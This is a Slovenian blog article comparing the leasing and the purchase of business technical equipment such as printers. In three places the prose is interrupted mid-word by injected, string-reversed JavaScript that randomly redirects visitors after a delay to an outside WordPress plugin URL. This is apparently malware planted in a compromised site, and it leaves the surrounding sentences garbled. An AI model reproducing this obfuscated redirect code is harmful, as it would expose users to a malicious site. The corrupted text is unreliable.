Najem tehnične opreme? Zakaj pa ne!

By | 10 marca, 2016

Vaše podjetje potrebuje novo tehnično opremo in sami ne veste ali je nakup zares najboljša izbira? V spodnjem članku vam bomo predstavili prednosti in slabosti nakupa ter najema.

Najem: prednosti

Prednost in hkrati problem tehnologije je v njenem napredku. Tehnična oprema postane hitro zastarela. Vedno vlagati v novo opremo pa je lahko za neko podjetje finančno zelo obremenjujoče. Z najemom finančno breme zastarelosti prenesete lahko na opremo lizinške družbe.

Primer: Poslovni najem tiskalnika se vam izteče po dveh letih. Takrat pa imate možnost najeti novo, boljšo in hitrejšo opremo. To je tudi glavni razlog, zakaj se nekateri odločajo za lizing avtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomobilov, kar se je preneslo tudi v svet printerjev.

Prednost najema so tudi predvidljivi mesečni stroški. Vsak mesec boste odplačevali določeno mesečno najemnino. Ničesar pa vam ni potrebno plačevati v naprej. Tako boste lažje porazdelili stroške podjetja. Samo dober plan je potrebno narediti in se tega tudi držati.

Nenazadnje pa z novejšo opremo boste lažje dohajali ali celo prehiteli konkurenco.

Najem: slabosti

Najem ima dve veliki slabosti. Dejstvo je, da na daljši rok boste več plačali. Primer: nakup tiskalnika bi vas stal 800 €, medtem ko poslovni najem tiskalnika pa 1200 € v celoti.

Druga slabost je v tem, da opremo plačujete, četudi je ne uporabljate. V primeru, da podjetje propade, boste morali opremo plačevati do konca izteka pogodbe.

Nakup: prednosti

Nakup je definitivno enostavnejši od najema. Odločite se, katera oprema vam najbolj ustreza in toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to opremo tudi kupite. Najem zahteva veliko papirologije, ki vključuje podrobne podatke o finančnem stanju podjetja.

Tudi kar se tiče vzdrževanja ste bolj svobodni. Poslovni najem tiskalnika ne pomeni samo uporabo tiskalnika, vendar tudi njegovo vzdrževanje. Po izteku pogodbe ga je potrebno vrniti v brezhibnem stanju.

Nakup: slabosti

Tako kot najem ima tudi nakup dve bistveni slabosti. Začetni izdatek za potrebno opremo je lahko previsok. Podjetje mora paziti, v kaj investira denar, da mu ga slučajno ne zmanjka za bistvene projekte. Drugi problem je v posodobitvi strojne opreme. Zaradi tehnološkega napredka oprema lahko zastari čez noč. Ko vaš računalnik ne podpira več novejšega sistema, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to povzroči določene nevšečnosti, ki vas lahko ovirajo pri vsakdanjem delu. To je dokaz, da je nujno potrebna menjava opreme.